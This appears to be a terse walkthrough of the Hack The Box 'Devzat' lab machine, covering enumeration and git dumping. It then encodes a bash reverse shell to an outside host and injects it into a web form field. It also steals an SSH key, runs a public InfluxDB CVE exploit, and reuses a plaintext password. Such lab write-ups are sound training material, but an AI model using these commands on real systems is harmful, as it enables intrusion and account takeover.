Devzat

Devzat


HTB Linux

nmap -A -p- -oA devzat 10.129.246.25 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA devzat 10.129.246.25

nmap -sU -O -p- -oA devzat-udp 10.129.246.25

nikto -h 10.129.246.25:80

ssh_command.

ssh_command.

echo “10.129.246.25 devzat.htb pets.devzat.htb” | sudo tee -a /etc/hosts

whatweb http://10.129.246.25

ssh_command.

Nos vamos a http://devzat.htb

ssh_command.

ffuf -c -u http://devzat.htb -H “Host:FUZZ.devzat.htb” -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

ssh_command.

ssh_command.

bash gitdumper.sh http://pets.devzat.htb/.git/ ~/Desktop/boxes/devzat/content/

ssh_command.

bash /home/cu3rv0x/Desktop/boxes/devzat/GitTools/Extractor/extractor.sh . ~/Desktop/boxes/devzat/content/.git

ssh_command.

cat main.go

ssh_command.

echo -n ‘bash -i >& /dev/tcp/10.10.14.77/443 0>&1’ |base64

ssh_command.

Abrimos burpsuite y interceptamos http://pets.devzat.htb

Ponemos el nombre y la categoria de mascota

ssh_command.

para el valor de species ponemos lo que habiamos adquirido cuando cambiamos el reverse shell a base64

ssh_command.

nc -lvnp 443

cd .ssh

cat id_rsa

ssh_command.

netstat -ant

chmod 600 id_rsa

ssh_command.

ssh -l patrick localhost -p 8443

ssh_command.

git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git

cd InfluxDB-Exploit-CVE-2019-20933

ssh_command.

credenciales catherine:woBeeYareedahc7Oogeephies7Aiseci

su catherine

cd /var/backups

cp devzat* /tmp

Unzip both files and you get a dev folder

ssh_command.

cat commands.go

ssh_command.

ssh -l test localhost -p 8443

file ../root.txt CeilingCatStillAThingIn2021?

ssh_command.

© 2025 Cu3rv0x